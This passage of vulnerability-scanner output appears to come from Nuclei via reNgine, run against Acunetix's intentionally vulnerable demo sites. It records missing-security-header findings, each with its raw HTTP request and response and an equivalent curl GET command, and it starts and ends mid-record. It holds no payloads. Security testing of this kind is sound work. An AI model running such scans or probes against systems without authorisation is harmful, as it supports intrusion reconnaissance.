Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.959696354Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.959705472Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:10.959715351Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:11.263602526Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:11.263619035Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:11.412392283Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:11.41244827Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; 